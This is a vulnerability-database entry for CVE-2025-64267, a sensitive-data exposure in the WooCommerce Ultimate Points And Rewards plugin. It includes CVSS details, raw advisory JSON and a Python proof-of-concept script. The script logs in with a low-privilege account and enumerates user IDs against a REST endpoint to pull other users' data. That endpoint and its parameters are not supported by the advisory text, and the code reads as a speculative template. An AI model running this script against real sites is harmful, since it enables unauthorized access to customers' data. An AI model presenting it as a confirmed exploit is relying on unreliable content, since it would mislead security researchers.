Security Vulnerability Report
中文
CVE-2025-64267 CVSS 4.3 MEDIUM

CVE-2025-64267

Published: 2025-11-13 10:15:52
Last Modified: 2026-04-27 16:16:39

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPSwings WooCommerce Ultimate Points And Rewards woocommerce-ultimate-points-and-rewards allows Retrieve Embedded Sensitive Data.This issue affects WooCommerce Ultimate Points And Rewards: from n/a through <= 2.10.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

woocommerce-ultimate-points-and-rewards <= 2.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64267 PoC - WooCommerce Ultimate Points And Rewards Sensitive Data Exposure # Affected: woocommerce-ultimate-points-and-rewards <= 2.10.2 import requests import json target_url = "http://target-site.com" # Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" api_endpoint = f"{target_url}/wp-json/wpswings/v1/points" session = requests.Session() # Step 1: Login with low-privilege account login_data = { "log": "low_priv_user", "pwd": "password123" } session.post(login_url, data=login_data) # Step 2: Exploit the sensitive data exposure vulnerability # Try to access points data for other users or sensitive system info headers = { "Content-Type": "application/json" } # Attempt to retrieve sensitive data through API response = session.get(api_endpoint, headers=headers) if response.status_code == 200: data = response.json() print(f"[+] Sensitive data exposed: {json.dumps(data, indent=2)}") else: print(f"[-] Request failed with status: {response.status_code}") # Alternative: Try parameter manipulation to access other users' data for user_id in range(1, 100): params = {"user_id": user_id} resp = session.get(api_endpoint, params=params) if resp.status_code == 200 and "points" in resp.text: print(f"[+] Found data for user {user_id}: {resp.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64267", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:52.100", "lastModified": "2026-04-27T16:16:39.027", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPSwings WooCommerce Ultimate Points And Rewards woocommerce-ultimate-points-and-rewards allows Retrieve Embedded Sensitive Data.This issue affects WooCommerce Ultimate Points And Rewards: from n/a through <= 2.10.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-ultimate-points-and-rewards/vulnerability/wordpress-woocommerce-ultimate-points-and-rewards-plugin-2-10-2-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}